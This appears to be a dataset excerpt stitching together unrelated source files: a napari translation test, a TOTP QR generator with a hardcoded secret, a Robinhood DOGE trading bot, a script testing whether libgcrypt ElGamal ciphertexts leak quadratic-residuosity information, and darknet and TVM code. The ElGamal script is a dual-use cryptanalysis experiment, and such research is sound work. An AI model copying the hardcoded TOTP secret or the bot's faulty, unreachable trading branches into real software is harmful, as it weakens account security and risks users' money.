issues[fpath].append((_lineno, value))
elif value in skip_words_for_file_check:
skip_words_for_file_check.remove(value)
if skip_words_for_file_check:
outdated_strings[fpath] = skip_words_for_file_check
if errors:
trans_errors[fpath] = errors
if not issues[fpath]:
issues.pop(fpath)
return issues, outdated_strings, trans_errors
# --- Fixture
# ----------------------------------------------------------------------------
@pytest.fixture(scope="module")
def checks():
paths = find_files(NAPARI_MODULE, SKIP_FOLDERS, SKIP_FILES)
issues, outdated_strings, trans_errors = find_issues(paths, SKIP_WORDS)
return issues, outdated_strings, trans_errors
# --- Tests
# ----------------------------------------------------------------------------
def test_missing_translations(checks):
issues, _, _ = checks
print(
"\nSome strings on the following files might need to be translated "
"or added to the skip list.\nSkip list is located at "
"`tools/strings_list.py` file.\n\n"
)
for fpath, values in issues.items():
print(f"{fpath}\n{'*' * len(fpath)}")
unique_values = set()
for line, value in values:
unique_values.add(value)
print(f"{line}:\t{repr(value)}")
print("\n")
if fpath in SKIP_WORDS:
print(
"List below can be copied directly to `tools/strings_list.py` file inside the '{fpath}' key:\n"
)
for value in sorted(unique_values):
print(f" {repr(value)},")
else:
print(
"List below can be copied directly to `tools/strings_list.py` file:\n"
)
print(f" {repr(fpath)}: [")
for value in sorted(unique_values):
print(f" {repr(value)},")
print(" ],")
print("\n")
no_issues = not issues
assert no_issues
def test_outdated_string_skips(checks):
_, outdated_strings, _ = checks
print(
"\nSome strings on the skip list on the `tools/strings_list.py` are "
"outdated.\nPlease remove them from the skip list.\n\n"
)
for fpath, values in outdated_strings.items():
print(f"{fpath}\n{'*' * len(fpath)}")
print(", ".join(repr(value) for value in values))
print("")
no_outdated_strings = not outdated_strings
assert no_outdated_strings
def test_translation_errors(checks):
_, _, trans_errors = checks
print(
"\nThe following translation strings do not provide some "
"interpolation variables:\n\n"
)
for fpath, errors in trans_errors.items():
print(f"{fpath}\n{'*' * len(fpath)}")
for string, variables in errors:
print(f"String:\t\t{repr(string)}")
print(
f"Variables:\t{', '.join(repr(value) for value in variables)}"
)
print("")
print("")
no_trans_errors = not trans_errors
assert no_trans_errors
``` |
{
"source": "0x00C0DE/cs370-proj4-qr-totp",
"score": 3
} |
#### File: 0x00C0DE/cs370-proj4-qr-totp/leebrad-MP4.py
```python
import os
import sys
import pyqrcode
import getpass
import random
import base64
import hmac
import string
import hashlib
import time
import math
import struct
import array
# function to generate qr code svg
def create_qrcode():
#creates user id
username = 'braden.lee96'
user_email = username + "@gmail.com"
#print(user_email)
# static secret to make testing purposes easier
secret = base64.b32encode(bytearray("BIGONEBUYNOWSAVE", "ascii")).decode('utf-8')[:-6]
#print(secret)
# Uri format
#url = 'otpauth://totp/' + '0x00C0DE' + ':' + user_email + '?secret=' + secret + '&issuer=' + '0x00C0DE'
url = 'otpauth://totp/' + 'smallmediumpizza' + ':' + user_email + '?secret=' + secret + '&issuer=' + 'smallmediumpiza'
#print(url)
# function to actually generate the qr
url_qrcode = pyqrcode.create(url)
# saves the qr as a svg image name "uri_qrcode.svg"
url_qrcode.svg("uri_qrcode.svg", scale="8")
return
# function to generate totp
def create_otp():
# epoch time
c_timer = math.floor(time.time())
# couter variable for 30 seconds
steps_thirty = 30
Time_counter = int((c_timer/steps_thirty))
t_c = Time_counter
#print("timer counter:", Time_counter)
# convert time to bytes
byte_arr = array.array('B')
for i in reversed(range(0, 8)):
# (AND) with 1111 1111 to leave the last 8 bits
byte_arr.insert(0, t_c & 0b11111111)
# perform bit shift by 8 places
t_c >>= 8
# Time converted to bytes
Time_bytes = byte_arr
#print("Time_bytes: ", Time_bytes)
# static secret to bytes
secret = bytearray("BIGONEBUYNOWSAVE", "ascii")
# hmac generation
qr_otp = hmac.new(secret, Time_bytes, hashlib.sha1).hexdigest()
# convert to binary and take last 4 bits to use as the offset(int)
bitstring = bin(int(qr_otp, 16))
last_4_bits = bitstring[-4:]
qr_offset = int(last_4_bits, 2)
# grabs the next 31 bits needed using (AND) with bitmask 01111111 11111111 11111111 11111111
binary_otp = int(qr_otp[(qr_offset * 2):((qr_offset * 2) + 8)], 16) & 0b01111111111111111111111111111111
# takes the last 6 digits as totp
dig_6 = str(binary_otp)
dig_6 = dig_6[-6:]
print("dig_6 is: ", dig_6)
return
# arg checker
if len(sys.argv) == 1:
print("[ERROR]")
print("not enough args.lol")
print("[ERROR]")
else:
first_arg = sys.argv[1]
print("first arg is:", first_arg)
if first_arg == '--generate-qr':
print("in [generate qr]")
create_qrcode()
if first_arg == "--get-otp":
print("in [get otp]")
create_otp()
print("done")
``` |
{
"source": "0x00C0DE/robinhood_crypto_bot",
"score": 3
} |
#### File: 0x00C0DE/robinhood_crypto_bot/rh_DOGE_bot_2021_v1.py
```python
import robin_stocks
import math
import pyotp
import sched
import time
import sys
# Program description:
# A Robinhood bot created to automatically monitor and trade crypto currency currently supported by Robinhood.
# Works specifically for DOGE.
#
# This bot runs a scheduler every 5 minutes in order to update the prices on a 5 minute interval for a
# list that will hold the previous prices for 30 minutes.
#
# This bot [REQUIRES] a individual to already have SET amount of shares of the current crypto they want to trade.
#
# Instructions after entering in login information (no particular order):
#
# 1. Fill in ticker (since this bot is specifically for DOGE, should be left alone)
# 2. Fill in average_cost
# 3. Fill in Shares2Buy amount (in dollars $)
# 4. Fill in Shares2Sell amount (in dollars $)
# 5. Fill in num_shares
#
# Some buying and selling errors will occur if a individual does not have enough shares to sell or enough money to buy.
# If errors occur, simply re-update through redoing instructions above and restart the program.
# Robinhood.login(username="example72", password="<PASSWORD>")
totp = pyotp.TOTP("Sauce").now()
login = robin_stocks.login("", "")
# Scheduler created to run every 5 mins
s = sched.scheduler(time.time, time.sleep)
# 5 min interval price history list, for every 30 minutes
SE3P = []
Mazda = []
counter1 = 1.0
counter2 = 1.0
Shares2Sell = 0.00
Shares2Buy = 0.00
# step (5)
# number of shares based on (total cost / Shares2Buy)
# EX: ($2940 / 20) = 147
num_shares = 147
# step (2)
# average cost
average_cost = 0.363
def run(sc):
# crypto currency ticker available on robinhood
ticker = "DOGE"
global SE3P
global Mazda
global Shares2Sell
global Shares2Buy
global counter1
global counter2
global average_cost
global num_shares
r = robin_stocks.crypto.get_crypto_quote(ticker, info="mark_price")
#r = robin_stocks.robinhood.get_latest_price(ticker)
print(ticker + ": $" + str(r))
SE3P.append(r)
if len(SE3P) > 6:
# if there are 5 or more elements in the list, rearrange positions
Mazda = SE3P[1:6]
SE3P = SE3P[-1:]
SE3P = Mazda + SE3P
print("Cleared and repositioned")
if len(SE3P) == 1:
#0min
print("appended SE3P[0]")
print(SE3P)
elif len(SE3P) == 2:
#SE3P.append(r) #5min
print("appended SE3P[1]")
print(SE3P)
elif len(SE3P) == 3:
#SE3P.append(r) #10min
print("appended SE3P[2]")
print(SE3P)
elif len(SE3P) == 4:
#SE3P.append(r) #15min
print("appended SE3P[3]")
print(SE3P)
elif len(SE3P) == 5:
#SE3P.append(r) #20min
print("appended SE3P[4]")
print(SE3P)
elif len(SE3P) == 6:
#SE3P.append(r) #25min
print("appended SE3P[5]")
print(SE3P)
# BUY
# if it's been less than 30 minutes since the start of the program
if counter1 < 6:
# For each 5 minutes, compare the inital price at the start of the program to the current price.
# Each 5 minutes passed, checks if difference is larger than a manually set percentage, progressively increasing the difference boundary.
# If the initial starting price when the program started multiplied by a set percentage, is greater than the current price AND
# the current price is lower than the average cost minus a set percentage, then buy Shares2Buy amount in dollars.
# If Bought, updates the average_cost and num_shares.
if counter1 == 6:
if float(SE3P[0])*1.005 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif counter1 == 5:
if float(SE3P[0])*1.0045 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif counter1 == 4:
if float(SE3P[0])*1.004 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif counter1 == 3:
if float(SE3P[0])*1.0035 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif counter1 == 2:
if float(SE3P[0])*1.003 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
#BUY
# if first price is < than 2nd
# if it has been 30 minutes or more since the start of the program
if counter1 >= 6:
# For each 5 minutes, compare the current price to each index of the list in order starting with [1]-[5] since the current price would be [0].
# Each 5 minutes passed, checks if difference is larger than a manually set percentage, progressively increasing the difference boundary.
# If the current price multiplied by a set percentage, is less than one of the indices AND
# the current price is lower than the average cost minus a set percentage, then buy Shares2Buy amount in dollars.
# If Bought, updates the average_cost and num_shares.
if float(r)*1.004 < float(SE3P[0]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.005 < float(SE3P[1]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.006 < float(SE3P[2]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.007 < float(SE3P[3]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.008 < float(SE3P[4]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.01 < float(SE3P[5]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
#SELL
# if it's been less than 30 minutes since the start of the program
if counter2 < 6:
# For each 5 minutes, compare the inital price at the start of the program to the current price.
# Each 5 minutes passed, checks if difference is larger than a manually set percentage, progressively increasing the difference boundary.
# If the initial starting price when the program started multiplied by a set percentage, is less than the current price AND
# the current price is greater than the average cost plus a set percentage, then sell Shares2Sell amount in dollars.
# If Sold, updates the average_cost and num_shares.
if counter2 == 6:
if float(SE3P[0])*1.0115 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif counter2 == 5:
if float(SE3P[0])*1.0105 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif counter2 == 4:
if float(SE3P[0])*1.0095 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif counter2 == 3:
if float(SE3P[0])*1.0085 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif counter2 == 2:
if float(SE3P[0])*1.0075 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
#SELL
# if it has been 30 minutes or more since the start of the program
if counter2 >= 6:
# For each 5 minutes, compare the current price to each index of the list in order starting with [1]-[5] since the current price would be [0].
# Each 5 minutes passed, checks if difference is larger than a manually set percentage, progressively increasing the difference boundary.
# If the current price multiplied by a set percentage, is greater than one of the indices AND
# the current price is greater than the average cost plus a set percentage, then sell Shares2Sell amount in dollars.
# If Sold, updates the average_cost and num_shares.
if float(r)*0.996 > float(SE3P[0]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.995 > float(SE3P[1]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.993 > float(SE3P[2]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.991 > float(SE3P[3]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.989 > float(SE3P[4]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.987 > float(SE3P[5]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
# Keeps track of counter
print("c1:" + str(counter1))
print("c2:" + str(counter2))
counter1 += 1
counter2 += 1
if num_shares <= 0:
sys.exit()
# calls scheduler every 5 minutes
s.enter(300, 1, run, (sc,))
# Functions to buy and sell crypto currency
def crypto_BUY(ticker, amountD):
r = robin_stocks.orders.order_buy_crypto_by_quantity(ticker, amountD)
print(r)
def crypto_SELL(ticker, amountD):
r = robin_stocks.orders.order_sell_crypto_by_quantity(ticker, amountD)
print(r)
s.enter(1, 1, run, (s,))
s.run()
``` |
{
"source": "0x00Jeff/ShitCrypt",
"score": 3
} |
#### File: 0x00Jeff/ShitCrypt/ShitCrypt.py
```python
from subprocess import call
import random
import math
def isQR(x, p):
q = (p - 1) / 2
return pow(x, q, p)
def findQNR(p):
r = random.randint(1, p - 1)
while isQR(r, p) == 1:
r = random.randint(1, p - 1)
return r
def findQR(p):
r = random.randint(1, p - 1)
return pow(r, 2, p)
print ("Generating the key...")
call(["gcc", "-o", "keygen", "keygen.c", "-lgcrypt"])
call(["gcc", "-o", "encrypt", "encrypt.c", "-lgcrypt"])
call("./keygen")
p = int(open("./p").read(), 16)
y = int(open("./y").read(), 16)
wrong = 0
runs = 1000
print ("Running the experiment...")
for i in xrange(runs):
pk = y
plaintexts = dict()
plaintexts[0] = findQNR(p)
plaintexts[1] = findQR(p)
challenge_bit = random.randint(0,1)
challenge_string = hex(plaintexts[challenge_bit])
challenge_string = challenge_string[2:-1]
challenge_string = challenge_string.zfill(256)
challenge_string = challenge_string.upper()
open("./pt", "wb").write(challenge_string)
call("./encrypt")
ct_a = int(open("./ct_a").read(), 16)
ct_b = int(open("./ct_b").read(), 16)
output = -1
if ((isQR(pk, p) == 1) or (isQR(ct_a, p) == 1)):
if isQR(ct_b, p) == 1:
output = 1
else:
output = 0
else:
if isQR(ct_b, p) == 1:
output = 0
else:
output = 1
if output != challenge_bit:
wrong = wrong + 1
print ("Number of times the guess was wrong (should be 50% if this shit is secure):"), wrong, "/", runs
``` |
{
"source": "0x00-pl/kendryte-model-compiler",
"score": 2
} |
#### File: darknet/D2T_lib/net.py
```python
import copy
import re
from . import bwidth
from . import layers
__parse_layers__ = {
'depthwise_convolutional': layers.dw_convolutional_layer,
'convolutional': layers.convolutional_layer,
'connected': None,
'maxpool': layers.maxpooling_layer,
'avgpool': layers.avgpooling_layer,
'route': layers.route_layer,
'softmax': None
}
__unit_size__ = {
'bit': 8,
'byte': 1,
'KB': 1.0 / 1024,
'MB': 1.0 / 1024 / 1024,
'GB': 1.0 / 1024 / 1024 / 1024
}
__empty_info__ = re.compile(' ')
"""
virtual class for only storing the structure of the network without param.
interference features:
- import .cfg -> virtual net
- export self -> .cfg
- export self -> tensorflow code (module like)
- statistics of parameters
"""
class net(object):
def __init__(self, name, scope=None, dtype='float32'):
self.name = name
self.scope = scope
self.dtype = dtype
self.layers = dict()
# input size
self.input_size = {
'batch': 1,
'size': [0],
}
# net route : to be used in the future, now as sequence
self.route = []
# statistics table
self.statistics = {}
def layers_from_cfg(self, cfg_path):
with open(cfg_path) as F:
# skip empty lines
contents = list(l.strip() for l in filter(lambda x: True if len(x) > 1 else False,
F.readlines()))
# get blocks for parsing
block_st = -1
line_id = 0
block_id = -1
for l in contents:
if l[0] == '[': # find block header
if block_st > -1:
# return kwargs for construct layer
self.parse_block(contents[block_st:line_id], copy.copy(block_id))
block_id += 1
block_st = line_id
line_id += 1
self.match_between_layers() # sequence layers
# match in/out
def match_between_layers(self):
prev_in_channel = self.input_size['size'][-1]
for k in self.route:
_layer = self.layers[k]
_layer.num_in = prev_in_channel
if _layer.num_out == 0:
_layer.num_out = prev_in_channel
elif _layer.num_out == -1: # route layer
_layer.num_out = 0
for prevl in range(len(_layer.route_layers)):
_jump = _layer.route_layers[prevl]
refer_l = self.route[k + _jump if _jump < 0 else _jump]
_layer.num_out += self.layers[refer_l].num_out
_layer.route_layers[prevl] = self.layers[refer_l].name
prev_in_channel = _layer.num_out
print(k, _layer.type, ' | ', _layer.num_in, '->', _layer.num_out)
# split block lines into dictionary
def __split_block_opt__(self, block_lines):
global __empty_info__
kv_split = list(__empty_info__.sub('', l).split('=') for l in block_lines)
kv_split = filter(lambda x: len(x) == 2, kv_split) # filtering invalid line
return {k[0]: k[1] for k in kv_split}
def parse_block(self, lines, index):
header = lines[0]
# get layer type
if header == '[net]':
net_opt = self.__split_block_opt__(lines[1:])
self.input_size['batch'] = (int)(net_opt['batch'])
self.input_size['size'] = [
(int)(net_opt['width']),
(int)(net_opt['height']),
(int)(net_opt['channels'])
]
elif header == '[region]':
pass
elif header[0] == '[':
default_name = header[1:-1]
default_scope = None
initializer = __parse_layers__[default_name]
if initializer:
# use the same keys as cfg file
layer_opt = self.__split_block_opt__(lines[1:])
layer_opt['#TYPE'] = default_name
if '#NAME' not in layer_opt:
layer_opt['#NAME'] = str(index)
if '#SCOPE' not in layer_opt:
layer_opt['#SCOPE'] = default_scope
self.layers[index] = initializer(dtype=self.dtype,
kwargs=layer_opt)
self.layers[layer_opt['#NAME']] = self.layers[index]
self.route.append(index)
else:
print('unsupported layer type: %s' % (header))
def statistcs_size(self, unit='MB', print_out=False, export_csv_as=None):
total_count = 0.0
self.statistics['layer_size'] = [] # may to be appled with Pandas in the future
# index |
# param count me |
# param size (:unit) me |
# param count accumulated |
# param size (:unit) accumulated |
# ractions
for k in self.route:
_layer = self.layers[k]
my_size = _layer.my_size(flag='count')
p_count = sum(my_size.values())
total_count += p_count
self.statistics['layer_size'].append([
str(k),
_layer.type,
p_count,
p_count * __unit_size__[unit] * bwidth.__bwidth__[self.dtype],
total_count,
total_count * __unit_size__[unit] * bwidth.__bwidth__[self.dtype],
None
])
# compute fractions
for l in self.statistics['layer_size']:
l[-1] = (float)(l[2]) / (float)(total_count)
# summary
self.statistics['summary'] = ([
total_count,
total_count * __unit_size__[unit] * bwidth.__bwidth__[self.dtype]
])
"""
table = DF(columns=['index', 'layer type',
'param count','param size(%s)'%(unit),
'acc. count', 'acc. size(%s)'%(unit),
'fraction(%)'],
data=self.statistics['layer_size'])
# formatting
if print_out or export_csv_as:
print_table = deepcopy(table)
print_table['index'] = print_table['index'].map(lambda x:'<%s>'%x)
print_table['param count'] = print_table['param count'].map(lambda x: '%i'%x)
print_table['acc. count'] = print_table['acc. count'].map(lambda x: '%i' % x)
print_table['fraction(%)'] = print_table['fraction(%)'].map(lambda x: '%.2f%%'%(x*100.0))
self.print_table = print_table
if print_out:
print('Data type: ', self.dtype)
print(print_table)
print('summary:\ntotal count: %i\ntotal size: %.4f %s'%(
self.statistics['summary'][0],
self.statistics['summary'][1],
unit
))
if export_csv_as is not None:
print_table.to_csv(export_csv_as,index=False)
"""
``` |
{
"source": "0x00-pl/tvm",
"score": 2
} |
#### File: relay/backend/profiler_vm.py
```python
import tvm
from . import vm, _vm
def _update_target(target):
target = target if target else tvm.target.current_target()
if target is None:
raise ValueError("Target is not set in env or passed as argument.")
tgts = {}
if isinstance(target, (str, tvm.target.Target)):
dev_type = tvm.expr.IntImm("int32", tvm.nd.context(str(target)).device_type)
tgts[dev_type] = tvm.target.create(target)
elif isinstance(target, dict):
for dev, tgt in target.items():
dev_type = tvm.expr.IntImm("int32", tvm.nd.context(dev).device_type)
tgts[dev_type] = tvm.target.create(tgt)
else:
raise TypeError("target is expected to be str, tvm.target.Target, " +
"or dict of str to str/tvm.target.Target, but received " +
"{}".format(type(target)))
return tgts
class VMCompilerProfiler(vm.VMCompiler):
"""Build Relay module to run on VM runtime."""
def __init__(self):
super().__init__()
self.mod = _vm._VMCompilerProfiler()
self._compile = self.mod["compile"]
self._get_vm = self.mod["get_vm"]
def compile(self, mod, target=None, target_host=None):
"""
Parameters
----------
mod : relay.Module
The Relay module to build.
target : str, :any:`tvm.target.Target`, or dict of str(i.e.
device/context name) to str/tvm.target.Target, optional
For heterogeneous compilation, it is a dictionary indicating context
to target mapping. For homogeneous compilation, it is a build target.
target_host : str or :any:`tvm.target.Target`, optional
Host compilation target, if target is device.
When TVM compiles device specific program such as CUDA,
we also need host(CPU) side code to interact with the driver
to setup the dimensions and parameters correctly.
target_host is used to specify the host side codegen target.
By default, llvm is used if it is enabled,
otherwise a stackvm intepreter is used.
Returns
-------
vm : VirtualMachineProfiler
The profile VM runtime.
"""
target = _update_target(target)
self._compile(mod, target, target_host)
return VirtualMachineProfiler(self._get_vm())
class VirtualMachineProfiler(vm.VirtualMachine):
"""Relay profile VM runtime."""
def __init__(self, mod):
super().__init__(mod)
self._get_stat = self.mod["get_stat"]
def get_stat(self):
return self._get_stat()
```
#### File: tvm/relay/_parser.py
```python
from __future__ import absolute_import
import sys
from ast import literal_eval
from typing import Any, Deque, Dict, List, Optional, TypeVar, Tuple, Union
from collections import deque
import tvm
from . import module
from .base import Span, SourceName
from . import adt
from . import expr
from . import ty
from . import op
PYTHON_VERSION = sys.version_info.major
try:
from .grammar.py3.RelayVisitor import RelayVisitor
from .grammar.py3.RelayParser import RelayParser
from .grammar.py3.RelayLexer import RelayLexer
except ImportError:
raise Exception("Couldn't find ANTLR parser. Try building with USE_ANTLR=ON.")
try:
from antlr4 import InputStream, CommonTokenStream
from antlr4.error.ErrorListener import ErrorListener
except ImportError:
raise Exception("Couldn't find ANTLR runtime." +
"Try running `pip{version} install antlr4-python{version}-runtime`."
.format(version=PYTHON_VERSION))
sys.setrecursionlimit(10000)
class ParseError(Exception):
"""Exception type for parse errors."""
def __init__(self, message: str) -> None:
super(ParseError, self).__init__()
self.message = message
def __repr__(self):
return "ParseError({})".format(self.message)
def __str__(self):
return repr(self)
class OpWrapper:
"""Overload the __call__ for op."""
pass
class ExprOp(OpWrapper):
"""Call an expr. The default, but does not handle attrs well."""
def __init__(self, operator):
self.operator = operator
def __call__(self, args, attrs, type_args):
try:
return expr.Call(self.operator, args, attrs, type_args)
except Exception:
raise Exception("Operator {} is not registered. It's attributes are {}"
.format(self.operator, attrs))
class FuncOp(OpWrapper):
"""Convert the attrs, call the python function with the attrs passed in as keyword arguments.
Tvm should provide this in the future, as this is pretty similar to what op.get is providing.
"""
def __init__(self, operator):
self.operator = operator
def convert(self, v):
if isinstance(v, tuple):
return tuple([self.convert(x) for x in v])
if isinstance(v, expr.Constant):
return v.data.asnumpy().item()
if isinstance(v, str):
return v
raise Exception(v)
def __call__(self, args, attrs, type_args):
if attrs is None:
attrs = {}
x = self.operator(*args, **{k: self.convert(v) for k, v in attrs.items()})
if isinstance(x, expr.TupleWrapper):
x = x.astuple()
return x
BINARY_OPS = {
RelayParser.MUL: op.multiply,
RelayParser.DIV: op.divide,
RelayParser.ADD: op.add,
RelayParser.SUB: op.subtract,
RelayParser.LT: op.less,
RelayParser.GT: op.greater,
RelayParser.LE: op.less_equal,
RelayParser.GE: op.greater_equal,
RelayParser.EQ: op.equal,
RelayParser.NE: op.not_equal,
}
FUNC_OPS = {
"nn.conv2d": op.nn.conv2d,
"nn.batch_norm": op.nn.batch_norm,
"nn.dense": op.nn.dense,
"nn.bias_add": op.nn.bias_add,
"nn.max_pool2d": op.nn.max_pool2d,
"nn.global_max_pool2d": op.nn.global_max_pool2d,
"nn.avg_pool2d": op.nn.avg_pool2d,
"nn.global_avg_pool2d": op.nn.global_avg_pool2d,
"nn.softmax": op.nn.softmax,
"reshape": op.reshape,
"nn.conv2d_transpose": op.nn.conv2d_transpose,
"concatenate": op.concatenate,
"nn.dropout": op.nn.dropout_raw,
"zeros": op.zeros,
"split": op.split,
"cast": op.cast
}
TYPE_PREFIXES = [
"int",
"uint",
"float",
"bool",
]
T = TypeVar("T")
Scope = Deque[Tuple[str, T]]
Scopes = Deque[Scope[T]]
def lookup(scopes: Scopes[T], name: str) -> Optional[T]:
"""Look up `name` in `scopes`."""
for scope in scopes:
for key, val in scope:
if key == name:
return val
return None
def spanify(f):
"""A decorator which attaches span information
to the value returned by calling `f`.
Intended for use with the below AST visiting
methods. The idea is that after we do the work
of constructing the AST we attach Span information.
"""
def _wrapper(*args, **kwargs):
# Assumes 0th arg is self and gets source_name from object.
sn = args[0].source_name
# Assumes 1st arg is an ANTLR parser context.
ctx = args[1]
ast = f(*args, **kwargs)
line, col = ctx.getSourceInterval()
sp = Span(sn, line, col)
if isinstance(ast, tvm.relay.expr.TupleWrapper):
ast = ast.astuple()
ast.set_span(sp)
return ast
return _wrapper
# TODO(@jmp): Use https://stackoverflow.com/q/13889941
# to figure out how to get ANTLR4 to be more unhappy about syntax errors
class ParseTreeToRelayIR(RelayVisitor):
"""Parse Relay text format into Relay IR."""
def __init__(self, source_name: str) -> None:
self.source_name = source_name
self.module = module.Module({}) # type: module.Module
# Adding an empty scope allows naked lets without pain.
self.var_scopes = deque([deque()]) # type: Scopes[expr.Var]
self.global_vars = {} # type: Scope[expr.GlobalVar]
self.type_var_scopes = deque([deque()]) # type: Scopes[ty.TypeVar]
self.global_type_vars = {} # type: Scope[expr.GlobalVar]
self.graph_expr = [] # type: List[expr.Expr]
super(ParseTreeToRelayIR, self).__init__()
def enter_var_scope(self) -> None:
"""Enter a new Var scope so it can be popped off later."""
